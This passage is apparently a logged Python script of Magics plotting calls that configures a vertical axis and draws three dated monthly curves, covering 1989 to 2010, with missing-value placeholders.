mpp.setr('axis_tick_label_height',0.4)
mpp.setc('axis_orientation','vertical')
mpp.setr('axis_tick_size',0.175)
mpp.setr('axis_tick_interval',0.5)
mpp.setr('axis_title_height',0.4)
mpp.setr('axis_max_value',7.5)
mpp.setc('axis_grid','on')
mpp.setc('axis_grid_line_style','dot')
mpp.setc('axis_grid_colour','black')
mpp.setr('axis_min_value',3.5)
mpp.setc('subpage_map_projection','none')
mpp.axis()
mpp.reset('axis_title_text')
mpp.reset('axis_tick_label_height')
mpp.reset('axis_orientation')
mpp.reset('axis_tick_size')
mpp.reset('axis_tick_interval')
mpp.reset('axis_title_height')
mpp.reset('axis_max_value')
mpp.reset('axis_grid')
mpp.reset('axis_grid_line_style')
mpp.reset('axis_grid_colour')
mpp.reset('axis_min_value')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','red')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
6.47115394e+00, 6.45232516e+00, 6.36749558e+00,
6.43538396e+00, 6.45271261e+00, 6.45271261e+00,
6.45271261e+00, 6.42326501e+00, 6.39778608e+00,
6.39029212e+00, 6.39029212e+00, 6.38083067e+00,
6.37096277e+00, 6.35236177e+00, 6.40800281e+00,
6.32139225e+00, 6.30370262e+00, 6.28165318e+00,
6.26192196e+00, 6.26192196e+00, 6.25573071e+00,
6.25573071e+00, 6.28225013e+00, 6.25413197e+00,
6.28463735e+00, 6.28463735e+00, 6.25573071e+00,
6.22869703e+00, 6.22869703e+00, 6.25859409e+00,
6.29212471e+00, 6.30978077e+00, 6.31591904e+00,
6.33120578e+00, 6.26345219e+00, 6.27269214e+00,
6.21262156e+00, 6.23163970e+00, 6.20369514e+00,
6.23083729e+00, 6.18007551e+00, 6.16468437e+00,
6.13704598e+00, 6.13086454e+00, 6.10054642e+00,
6.04724455e+00, 6.07261613e+00, 6.05364904e+00,
6.01498130e+00, 5.97606336e+00, 6.04545284e+00,
6.01747455e+00, 6.04297112e+00, 6.02038205e+00,
6.01366499e+00, 6.00145816e+00, 5.99569290e+00,
5.98853070e+00, 5.96280136e+00, 5.96280136e+00,
5.99186949e+00, 5.99186949e+00, 5.95112034e+00,
5.95112034e+00, 5.93373126e+00, 5.91199346e+00,
5.90529423e+00, 5.88210563e+00, 5.88798211e+00,
5.88083044e+00, 5.88083044e+00, 5.90035310e+00,
5.81520994e+00, 5.82501788e+00, 5.81492333e+00,
5.80552897e+00, 5.76339021e+00, 5.80918812e+00,
5.77718213e+00, 5.79468147e+00, 5.80079018e+00,
5.82294313e+00, 5.84928771e+00, 5.85932306e+00,
5.92417364e+00, 5.95385029e+00, 5.92501758e+00,
5.91593892e+00, 5.94018799e+00, 5.90980823e+00,
5.94775868e+00, 5.93625864e+00, 5.94859927e+00,
5.93401213e+00, 5.90804536e+00, 5.85021367e+00,
5.82129711e+00, 5.74289416e+00, 5.71430952e+00,
5.70504163e+00, 5.68807232e+00, 5.68052228e+00,
5.66002061e+00, 5.64852488e+00, 5.62923914e+00,
5.63685787e+00, 5.63685787e+00, 5.60862431e+00,
5.58927544e+00, 5.58927544e+00, 5.59888382e+00,
5.57135531e+00, 5.57135531e+00, 5.60297540e+00,
5.60297540e+00, 5.62672196e+00, 5.63301281e+00,
5.62538888e+00, 5.58263677e+00, 5.55547778e+00,
5.50030302e+00, 5.51006655e+00, 5.45351569e+00,
5.43545460e+00, 5.40986753e+00, 5.36159180e+00,
5.36159180e+00, 5.34267411e+00, 5.31703238e+00,
5.28622424e+00, 5.25269772e+00, 5.20768663e+00,
5.18941230e+00, 5.11044682e+00, 5.11044682e+00,
5.05634914e+00, 5.02195181e+00, 4.99824969e+00,
4.96949025e+00, 4.97610959e+00, 4.98272014e+00,
4.98272014e+00, 4.97426712e+00, 4.98338907e+00,
4.98338907e+00, 4.96462486e+00, 4.93558507e+00,
4.97192116e+00, 4.96361763e+00, 4.94115371e+00,
4.92764311e+00, 4.92095858e+00, 4.90773199e+00,
4.89982993e+00, 4.86706619e+00, 4.84853930e+00,
4.84853930e+00, 4.82994134e+00, 4.78356562e+00,
4.75499737e+00, 4.71407467e+00, 4.71407467e+00,
4.70062053e+00, 4.66815452e+00, 4.66145542e+00,
4.65331423e+00, 4.68757222e+00, 4.65116473e+00,
4.60298816e+00, 4.60298816e+00, 4.57602448e+00,
4.53872229e+00, 4.53872229e+00, 4.52327315e+00,
4.53017660e+00, 4.50656928e+00, 4.49981481e+00,
4.48348823e+00, 4.47427834e+00, 4.47427834e+00,
4.49360657e+00, 4.46486282e+00, 4.48311648e+00,
4.48311648e+00, 4.47502328e+00, 4.46010090e+00,
4.45308882e+00, 4.47073819e+00, 4.45767129e+00,
4.45767129e+00, 4.45767129e+00, 4.46691542e+00,
4.43799880e+00, 4.44747119e+00, 4.47632662e+00,
4.46728851e+00, 4.45935347e+00, 4.45215304e+00,
4.43217403e+00, 4.44494094e+00, 4.42662400e+00,
4.41861592e+00, 4.39165876e+00, 4.38225589e+00,
4.39184851e+00, 4.36358033e+00, 4.31508980e+00,
4.28806483e+00, 4.28806483e+00, 4.28806483e+00,
4.28154956e+00, 4.24980392e+00, 4.26887963e+00,
4.24509521e+00, 4.21040378e+00, 4.18210473e+00,
4.14286535e+00, 4.13329973e+00, 4.14306650e+00,
4.12532827e+00, 4.12532827e+00, 4.11035278e+00,
4.11035278e+00, 4.11035278e+00, 4.08431961e+00,
4.06130111e+00, 4.07890917e+00, 4.04279194e+00,
4.07267316e+00, 4.04464667e+00, 4.02481884e+00,
4.08156424e+00, 4.04876524e+00, 4.06396768e+00,
4.05729795e+00, 4.05123438e+00, 4.05123438e+00,
4.05123438e+00, 4.03350551e+00, 4.06037765e+00,
4.07072885e+00, 4.07982843e+00, 4.04289500e+00,
3.99468397e+00, 4.01932830e+00, 3.98235692e+00,
3.97575989e+00, 3.98193839e+00, 3.98831627e+00,
3.98089186e+00, 3.94406305e+00, 3.91908259e+00,
3.86916119e+00, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38])) #264
mpp.setc('graph_missing_data_colour','red')
mpp.seti('graph_symbol_marker_index',15)
mpp.setc('graph_symbol_colour','red')
mpp.setc('graph_missing_data_style','dash')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','dash')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','brick')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
6.99559385e+00, 6.90983598e+00, 6.82300032e+00,
6.83245929e+00, 6.77956488e+00, 6.76479859e+00,
6.75172817e+00, 6.75172817e+00, 6.73337459e+00,
6.72575894e+00, 6.69950247e+00, 6.69950247e+00,
6.67957084e+00, 6.69850730e+00, 6.71739037e+00,
6.67957084e+00, 6.67957084e+00, 6.67957084e+00,
6.67314269e+00, 6.67314269e+00, 6.69807186e+00,
6.65463498e+00, 6.66333250e+00, 6.58989125e+00,
6.59993687e+00, 6.59027061e+00, 6.56156739e+00,
6.54299880e+00, 6.51715684e+00, 6.52476053e+00,
6.55883628e+00, 6.57127588e+00, 6.55832804e+00,
6.58723513e+00, 6.52808037e+00, 6.58299577e+00,
6.58299577e+00, 6.71739037e+00, 6.76467540e+00,
6.82947045e+00, 6.83757998e+00, 6.83032454e+00,
6.79760987e+00, 6.77974926e+00, 6.78595363e+00,
6.77876587e+00, 6.82727374e+00, 6.84580163e+00,
6.78932986e+00, 6.64692912e+00, 6.68742601e+00,
6.65839070e+00, 6.65839070e+00, 6.62979386e+00,
6.65638791e+00, 6.66839561e+00, 6.65588712e+00,
6.65588712e+00, 6.59046028e+00, 6.57121247e+00,
6.59020738e+00, 6.61916410e+00, 6.54872761e+00,
6.55845510e+00, 6.54166136e+00, 6.55591336e+00,
6.54898211e+00, 6.54898211e+00, 6.53675506e+00,
6.54420864e+00, 6.55997967e+00, 6.60902161e+00,
6.52737824e+00, 6.54751861e+00, 6.55724790e+00,
6.55724790e+00, 6.52514368e+00, 6.52514368e+00,
6.48594635e+00, 6.45600496e+00, 6.46213329e+00,
6.43984989e+00, 6.45639218e+00, 6.39648341e+00,
6.48960708e+00, 6.48960708e+00, 6.43234017e+00,
6.34724350e+00, 6.36350270e+00, 6.36350270e+00,
6.38291992e+00, 6.37723817e+00, 6.37723817e+00,
6.39973958e+00, 6.39133528e+00, 6.39133528e+00,
6.39133528e+00, 6.35052491e+00, 6.38872705e+00,
6.42514591e+00, 6.41703462e+00, 6.40969318e+00,
6.38416009e+00, 6.38416009e+00, 6.36009696e+00,
6.35242736e+00, 6.37815282e+00, 6.31334565e+00,
6.34435445e+00, 6.37482026e+00, 6.42527561e+00,
6.39778608e+00, 6.45723109e+00, 6.46451854e+00,
6.48973549e+00, 6.50685536e+00, 6.51837147e+00,
6.52584605e+00, 6.52584605e+00, 6.62690224e+00,
6.56854880e+00, 6.51984151e+00, 6.39654855e+00,
6.37011251e+00, 6.29371379e+00, 6.27162924e+00,
6.25832779e+00, 6.24633226e+00, 6.22280751e+00,
6.25132713e+00, 6.19523277e+00, 6.02864375e+00,
5.97449123e+00, 5.89892132e+00, 5.93050665e+00,
5.90077037e+00, 5.90077037e+00, 5.87645533e+00,
5.86894756e+00, 5.85561114e+00, 5.87583650e+00,
5.83766506e+00, 5.83766506e+00, 5.82887925e+00,
5.80940330e+00, 5.80652578e+00, 5.81460302e+00,
5.87994756e+00, 5.89197901e+00, 5.89633078e+00,
5.87340830e+00, 5.89189486e+00, 5.88188391e+00,
5.86981189e+00, 5.81316322e+00, 5.79508772e+00,
5.80772044e+00, 5.80390242e+00, 5.71488918e+00,
5.58455174e+00, 5.54105257e+00, 5.56268738e+00,
5.55763439e+00, 5.54251666e+00, 5.53687145e+00,
5.54555022e+00, 5.59948374e+00, 5.61497025e+00,
5.58562685e+00, 5.56643431e+00, 5.54859114e+00,
5.58939397e+00, 5.57848098e+00, 5.52037816e+00,
5.52170339e+00, 5.48657832e+00, 5.48400173e+00,
5.45494119e+00, 5.42723763e+00, 5.43753927e+00,
5.40414039e+00, 5.37206276e+00, 5.35832841e+00,
5.32288064e+00, 5.28115123e+00, 5.27896139e+00,
5.26009822e+00, 5.26665533e+00, 5.24667831e+00,
5.22665285e+00, 5.19755471e+00, 5.14539762e+00,
5.10910543e+00, 5.09919520e+00, 5.09540234e+00,
5.11411038e+00, 5.09239629e+00, 5.07833880e+00,
5.06902604e+00, 5.09127931e+00, 5.06867011e+00,
5.06328698e+00, 5.05024752e+00, 5.07868093e+00,
5.08640672e+00, 5.07177566e+00, 5.07177566e+00,
5.03915006e+00, 5.04553598e+00, 5.05515661e+00,
5.04803427e+00, 5.00038499e+00, 5.01064450e+00,
5.04298883e+00, 5.01916962e+00, 5.04089368e+00,
5.00241215e+00, 4.96303243e+00, 4.95356896e+00,
4.88367875e+00, 4.87648066e+00, 4.84785051e+00,
4.85519590e+00, 4.87030987e+00, 4.86686944e+00,
4.80200479e+00, 4.80631096e+00, 4.66400579e+00,
4.65415048e+00, 4.62165014e+00, 4.56296504e+00,
4.63944860e+00, 4.59232875e+00, 4.58853916e+00,
4.56834945e+00, 4.56052811e+00, 4.54877090e+00,
4.54803529e+00, 4.52919971e+00, 4.58486823e+00,
4.56630321e+00, 4.57292211e+00, 4.56738620e+00,
4.51311607e+00, 4.53472620e+00, 4.51908914e+00,
4.51041480e+00, 4.50783485e+00, 4.50912501e+00,
4.50986696e+00, 4.48412756e+00, 4.48802109e+00,
4.48314900e+00, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38])) #264
mpp.setc('graph_missing_data_colour','brick')
mpp.seti('graph_symbol_marker_index',1)
mpp.setc('graph_symbol_colour','brick')
mpp.setc('graph_missing_data_style','solid')
mpp.setr('graph_symbol_height',0.4)
mpp.setc('graph_type','curve')
mpp.setc('graph_line_style','solid')
mpp.seti('graph_line_thickness',7)
mpp.setc('subpage_map_projection','none')
mpp.graph()
mpp.reset('graph_line_colour')
mpp.reset('graph_curve_date_x_values')
mpp.reset('graph_missing_data_mode')
mpp.reset('graph_symbol')
mpp.reset('graph_missing_data_thickness')
mpp.reset('graph_curve_y_values')
mpp.reset('graph_missing_data_colour')
mpp.reset('graph_symbol_marker_index')
mpp.reset('graph_symbol_colour')
mpp.reset('graph_missing_data_style')
mpp.reset('graph_symbol_height')
mpp.reset('graph_type')
mpp.reset('graph_line_style')
mpp.reset('graph_line_thickness')
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.enqr('page_x_position') #0.0
mpp.enqr('page_y_position') #0.0
mpp.enqr('page_x_length') #29.7
mpp.enqr('page_y_length') #21.0
mpp.setc('graph_line_colour','blue')
mpp.set1c('graph_curve_date_x_values',['1989-01-01', '1989-02-01', '1989-03-01', '1989-04-01', '1989-05-01', '1989-06-01', '1989-07-01', '1989-08-01', '1989-09-01', '1989-10-01', '1989-11-01', '1989-12-01', '1990-01-01', '1990-02-01', '1990-03-01', '1990-04-01', '1990-05-01', '1990-06-01', '1990-07-01', '1990-08-01', '1990-09-01', '1990-10-01', '1990-11-01', '1990-12-01', '1991-01-01', '1991-02-01', '1991-03-01', '1991-04-01', '1991-05-01', '1991-06-01', '1991-07-01', '1991-08-01', '1991-09-01', '1991-10-01', '1991-11-01', '1991-12-01', '1992-01-01', '1992-02-01', '1992-03-01', '1992-04-01', '1992-05-01', '1992-06-01', '1992-07-01', '1992-08-01', '1992-09-01', '1992-10-01', '1992-11-01', '1992-12-01', '1993-01-01', '1993-02-01', '1993-03-01', '1993-04-01', '1993-05-01', '1993-06-01', '1993-07-01', '1993-08-01', '1993-09-01', '1993-10-01', '1993-11-01', '1993-12-01', '1994-01-01', '1994-02-01', '1994-03-01', '1994-04-01', '1994-05-01', '1994-06-01', '1994-07-01', '1994-08-01', '1994-09-01', '1994-10-01', '1994-11-01', '1994-12-01', '1995-01-01', '1995-02-01', '1995-03-01', '1995-04-01', '1995-05-01', '1995-06-01', '1995-07-01', '1995-08-01', '1995-09-01', '1995-10-01', '1995-11-01', '1995-12-01', '1996-01-01', '1996-02-01', '1996-03-01', '1996-04-01', '1996-05-01', '1996-06-01', '1996-07-01', '1996-08-01', '1996-09-01', '1996-10-01', '1996-11-01', '1996-12-01', '1997-01-01', '1997-02-01', '1997-03-01', '1997-04-01', '1997-05-01', '1997-06-01', '1997-07-01', '1997-08-01', '1997-09-01', '1997-10-01', '1997-11-01', '1997-12-01', '1998-01-01', '1998-02-01', '1998-03-01', '1998-04-01', '1998-05-01', '1998-06-01', '1998-07-01', '1998-08-01', '1998-09-01', '1998-10-01', '1998-11-01', '1998-12-01', '1999-01-01', '1999-02-01', '1999-03-01', '1999-04-01', '1999-05-01', '1999-06-01', '1999-07-01', '1999-08-01', '1999-09-01', '1999-10-01', '1999-11-01', '1999-12-01', '2000-01-01', '2000-02-01', '2000-03-01', '2000-04-01', '2000-05-01', '2000-06-01', '2000-07-01', '2000-08-01', '2000-09-01', '2000-10-01', '2000-11-01', '2000-12-01', '2001-01-01', '2001-02-01', '2001-03-01', '2001-04-01', '2001-05-01', '2001-06-01', '2001-07-01', '2001-08-01', '2001-09-01', '2001-10-01', '2001-11-01', '2001-12-01', '2002-01-01', '2002-02-01', '2002-03-01', '2002-04-01', '2002-05-01', '2002-06-01', '2002-07-01', '2002-08-01', '2002-09-01', '2002-10-01', '2002-11-01', '2002-12-01', '2003-01-01', '2003-02-01', '2003-03-01', '2003-04-01', '2003-05-01', '2003-06-01', '2003-07-01', '2003-08-01', '2003-09-01', '2003-10-01', '2003-11-01', '2003-12-01', '2004-01-01', '2004-02-01', '2004-03-01', '2004-04-01', '2004-05-01', '2004-06-01', '2004-07-01', '2004-08-01', '2004-09-01', '2004-10-01', '2004-11-01', '2004-12-01', '2005-01-01', '2005-02-01', '2005-03-01', '2005-04-01', '2005-05-01', '2005-06-01', '2005-07-01', '2005-08-01', '2005-09-01', '2005-10-01', '2005-11-01', '2005-12-01', '2006-01-01', '2006-02-01', '2006-03-01', '2006-04-01', '2006-05-01', '2006-06-01', '2006-07-01', '2006-08-01', '2006-09-01', '2006-10-01', '2006-11-01', '2006-12-01', '2007-01-01', '2007-02-01', '2007-03-01', '2007-04-01', '2007-05-01', '2007-06-01', '2007-07-01', '2007-08-01', '2007-09-01', '2007-10-01', '2007-11-01', '2007-12-01', '2008-01-01', '2008-02-01', '2008-03-01', '2008-04-01', '2008-05-01', '2008-06-01', '2008-07-01', '2008-08-01', '2008-09-01', '2008-10-01', '2008-11-01', '2008-12-01', '2009-01-01', '2009-02-01', '2009-03-01', '2009-04-01', '2009-05-01', '2009-06-01', '2009-07-01', '2009-08-01', '2009-09-01', '2009-10-01', '2009-11-01', '2009-12-01', '2010-01-01', '2010-02-01', '2010-03-01', '2010-04-01', '2010-05-01', '2010-06-01', '2010-07-01', '2010-08-01', '2010-09-01', '2010-10-01', '2010-11-01', '2010-12-01'])
mpp.setc('graph_missing_data_mode','ignore')
mpp.setc('graph_symbol','on')
mpp.seti('graph_missing_data_thickness',7)
mpp.set1r('graph_curve_y_values',array([ 1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
1.70000000e+38, 1.70000000e+38, 1.70000000e+38,
6.88648215e+00, 6.87597927e+00, 6.84517083e+00,
6.94537125e+00, 6.98296629e+00, 7.01517835e+00,
7.01517835e+00, 7.00876075e+00, 7.01543752e+00,
6.92230694e+00, 6.94700175e+00, 7.02240462e+00,
7.01201350e+00, 7.03100277e+00, 7.07737004e+00,
7.01320184e+00, 7.03100277e+00, 7.03100277e+00,
7.02454032e+00, 7.03639349e+00, 7.04260842e+00,
7.07094996e+00, 7.13132760e+00, 7.05708863e+00,
7.09900228e+00, 7.12799645e+00, 7.12799645e+00,
7.17257508e+00, 7.12974988e+00, 7.10780088e+00,
7.12068583e+00, 7.09771090e+00, 7.07954801e+00,
7.10193636e+00, 7.03307661e+00, 7.05106375e+00,
6.98838322e+00, 6.99845221e+00, 7.05821035e+00,
7.08666588e+00, 7.04627561e+00, 7.01830939e+00,
6.98647503e+00, 6.99213844e+00, 6.99213844e+00,
6.92694016e+00, 6.89462351e+00, 6.90398436e+00,
6.82532051e+00, 6.80477773e+00, 6.80477773e+00,
6.76547609e+00, 6.81627953e+00, 6.83044654e+00,
6.84312307e+00, 6.83166646e+00, 6.81970185e+00,
6.83361788e+00, 6.84160069e+00, 6.81358936e+00,
6.83264224e+00, 6.79301111e+00, 6.62727948e+00,
6.54357191e+00, 6.46574306e+00, 6.41547608e+00,
6.39537593e+00, 6.38363794e+00, 6.36540127e+00,
6.32896779e+00, 6.29517011e+00, 6.26591308e+00,
6.13038879e+00, 6.07817133e+00, 6.12766949e+00,
6.18614042e+00, 6.15318346e+00, 6.17488192e+00,
6.14891589e+00, 6.14891589e+00, 6.16137160e+00,
6.16137160e+00, 6.21389572e+00, 6.21389572e+00,
6.24973333e+00, 6.29013778e+00, 6.22347706e+00,
6.15609454e+00, 6.16414363e+00, 6.14952573e+00,
6.18230000e+00, 6.18230000e+00, 6.18869938e+00,
6.19589918e+00, 6.16028950e+00, 6.11310069e+00,
6.10375567e+00, 6.02238878e+00, 6.02238878e+00,
6.01304138e+00, 6.01304138e+00, 6.00576112e+00,
5.97201808e+00, 5.96000559e+00, 5.94046856e+00,
5.98825239e+00, 5.96210254e+00, 5.97152968e+00,
5.99075677e+00, 6.01047696e+00, 6.03931563e+00,
6.02107410e+00, 6.00472037e+00, 6.01200189e+00,
6.02171418e+00, 6.03239104e+00, 6.02381731e+00,
5.98544693e+00, 5.98544693e+00, 5.97045853e+00,
